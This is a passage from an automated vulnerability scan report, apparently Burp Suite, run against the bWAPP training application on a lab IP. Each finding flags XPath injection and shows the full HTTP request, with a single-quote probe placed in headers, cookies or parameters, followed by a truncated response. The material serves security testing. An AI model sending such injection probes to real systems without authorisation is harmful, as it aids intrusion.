The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:35 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.19. http://192.168.52.147/bWAPP/ba_forgotten.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:30 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.20. http://192.168.52.147/bWAPP/ba_forgotten.php [admin cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:46 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.21. http://192.168.52.147/bWAPP/ba_forgotten.php [bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:04:55 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.22. http://192.168.52.147/bWAPP/ba_forgotten.php [form_bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:09 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.23. http://192.168.52.147/bWAPP/ba_forgotten.php [form_security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:00 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12977

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.24. http://192.168.52.147/bWAPP/ba_forgotten.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:17 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.25. http://192.168.52.147/bWAPP/ba_forgotten.php [name of an arbitrarily supplied body parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:11 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.26. http://192.168.52.147/bWAPP/ba_forgotten.php [secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:38 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.27. http://192.168.52.147/bWAPP/ba_forgotten.php [security_level cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:32 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.28. http://192.168.52.147/bWAPP/ba_forgotten.php [security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:13 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12974

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.29. http://192.168.52.147/bWAPP/ba_forgotten.php [top_security_nossl cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_forgotten.php

Issue detail

The top_security_nossl cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the top_security_nossl cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_forgotten.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_forgotten.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317'

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:54 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.30. http://192.168.52.147/bWAPP/ba_insecure_login.php [Base64-decoded value of the secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_insecure_login.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:51 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15303

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.31. http://192.168.52.147/bWAPP/ba_insecure_login.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_insecure_login.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:34 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15303

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.32. http://192.168.52.147/bWAPP/ba_insecure_login.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_insecure_login.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:28 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15303

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.33. http://192.168.52.147/bWAPP/ba_insecure_login.php [admin cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_insecure_login.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:45 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15303

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.34. http://192.168.52.147/bWAPP/ba_insecure_login.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_insecure_login.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:59 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
